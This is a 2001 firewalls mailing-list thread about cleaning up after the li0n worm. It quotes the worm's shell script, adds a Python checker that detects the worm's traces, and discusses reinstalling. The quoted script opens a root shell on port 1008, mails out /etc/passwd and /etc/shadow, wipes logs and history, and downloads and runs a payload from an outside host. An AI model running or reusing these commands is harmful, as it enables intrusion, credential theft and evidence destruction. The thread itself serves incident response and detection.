While I've never personally had to recover a li0n'd box, I can offer some
links to help:

http://www.whitehats.com/library/worms/lion/index.html

By far and above the most comprehensive analysis. Ahem, most of you on this
list should have whitehats bookmarked already......

Per their site, li0n's code looks like this:

PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin';
export PATH;
export TERM=vt100;
rm -rf /dev/.lib;
mkdir /dev/.lib;
cd /dev/.lib;
echo '1008 stream tcp nowait root /bin/sh sh' >>/etc/inetd.conf;
killall -HUP inetd;
ifconfig -a>1i0n;
cat /etc/passwd >>1i0n;
cat /etc/shadow >>1i0n;
mail [EMAIL PROTECTED] <1i0n;
rm -fr 1i0n;
rm -fr /.bash_history;
echo >/var/log/messages;
echo >/var/log/maillog;
lynx -dump http://coollion.51.net/crew.tgz >1i0n.tgz;
tar -zxvf 1i0n.tgz;
rm -fr 1i0n.tgz;
cd lib;
./1i0n.sh;

Neat stuff. Looks like the only file modified is inetd.conf. All else is
just echoed or created by the worm.

Hope this helps.

Jeremiah
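
The script quoted above leaves a handful of traces on the box: the hidden
/dev/.lib drop directory, the extra inetd.conf line that hands port 1008
straight to /bin/sh as root, and /var/log/messages and /var/log/maillog
wiped down to a single newline by 'echo >'. The following checker is an
added example and not part of the original mail or the whitehats write-up;
it scans a root tree for those traces and generalises the inetd check to
any entry whose server program is a shell, not only the 1008 line. The
file layout it builds for demonstration (build_fixture, demo) is
constructed here for illustration.

```python
"""Added example: check a Unix root tree for the traces the quoted li0n script
leaves behind.  Not part of the original mail; the fixture-building helpers
and the sample file contents are constructed for illustration."""
import os
import tempfile
from pathlib import Path

# Indicators lifted from the script quoted above.
DROP_DIR = "dev/.lib"                                   # mkdir /dev/.lib
WIPED_LOGS = ("var/log/messages", "var/log/maillog")    # echo >/var/log/...
SHELLS = {"sh", "bash"}                                 # ... nowait root /bin/sh sh


def parse_inetd_line(line):
    """Split an inetd.conf entry into its fields; None for comments/blank lines.
    Format: service socktype proto wait/nowait user program [args...]"""
    line = line.split("#", 1)[0].strip()
    fields = line.split()
    if len(fields) < 6:
        return None
    keys = ("service", "socktype", "proto", "wait", "user", "program")
    entry = dict(zip(keys, fields[:6]))
    entry["args"] = fields[6:]
    return entry


def shell_backdoors(inetd_text):
    """Entries whose server program is a shell.  This generalises the single
    '1008 ... /bin/sh' line: any port handed straight to sh/bash is a bind shell."""
    hits = []
    for lineno, raw in enumerate(inetd_text.splitlines(), 1):
        entry = parse_inetd_line(raw)
        if entry and os.path.basename(entry["program"]) in SHELLS:
            hits.append((lineno, entry["service"], entry["user"], raw.strip()))
    return hits


def scan_root(root):
    """Return a list of human-readable findings for the tree rooted at `root`
    (pass '/' on a live host, or a mounted image for offline forensics)."""
    root = Path(root)
    findings = []
    inetd = root / "etc" / "inetd.conf"
    if inetd.is_file():
        for lineno, service, user, raw in shell_backdoors(inetd.read_text()):
            findings.append(f"inetd.conf:{lineno}: shell served on '{service}' as {user}: {raw}")
    if (root / DROP_DIR).is_dir():
        findings.append(f"/{DROP_DIR} exists (worm drop directory)")
    for log in WIPED_LOGS:
        path = root / log
        # 'echo >file' leaves a one-byte file; a system log that size has been wiped
        if path.is_file() and path.stat().st_size <= 1:
            findings.append(f"/{log} truncated to {path.stat().st_size} bytes")
    return findings


def build_fixture(root, infected):
    """Constructed test tree: a clean host, or one with the li0n traces added."""
    root = Path(root)
    (root / "etc").mkdir(parents=True)
    (root / "var" / "log").mkdir(parents=True)
    conf = "# constructed inetd.conf\nftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a\n"
    logs = "May 11 06:05:00 host inetd[123]: constructed log line\n"
    if infected:
        conf += "1008 stream tcp nowait root /bin/sh sh\n"
        logs = "\n"                      # what 'echo >/var/log/messages' leaves
        (root / DROP_DIR).mkdir(parents=True)
    (root / "etc" / "inetd.conf").write_text(conf)
    for log in WIPED_LOGS:
        (root / log).write_text(logs)


def demo():
    """Scan one clean and one infected constructed tree; returns both finding lists."""
    results = []
    for infected in (False, True):
        with tempfile.TemporaryDirectory() as tmp:
            build_fixture(tmp, infected)
            results.append(scan_root(tmp))
    return results


if __name__ == "__main__":
    clean, infected = demo()
    print("clean host:", clean)
    for line in infected:
        print("infected host:", line)
```

On a live system run scan_root("/"); against a disk image, point it at the
mount point. An empty /var/log/messages is only suggestive on its own (a
fresh install or a just-rotated log looks the same), but together with a
root shell entry in inetd.conf and a hidden directory under /dev it matches
the script above closely enough to justify the reinstall discussed below.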

-----Original Message-----
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]On Behalf Of Alan Clegg
Sent: Friday, May 11, 2001 6:05 AM
To: [EMAIL PROTECTED]
Subject: Re: OT - lionworm


Unless the network is lying to me again, Devdas Bhagat said:

> > 'man install'

> How does install react to a chattr +i'ed file?

I guessed, from the lack of explicit information on how it was failing that
the failure was "text file busy".  Until you pointed me to it, I'd never
even heard of 'chattr'. I responded from a more BSD side of the world.
Perhaps 'chflags' ;-)

> Also, given that this is a cracked machine, and the forensic evidence
> modified, why not simply format and reinstall?

Good question, but not related to what he asked.  (not that my answer was
correct, and I should probably have kept my yap shut).

> That makes more sense.

I agree.

> Unless you know exactly which files were modified (tripwire or
> something similar)

Which makes me wonder even more about why this was asked on firewalls.

AlanC
-
[To unsubscribe, send mail to [EMAIL PROTECTED] with
"unsubscribe firewalls" in the body of the message.]
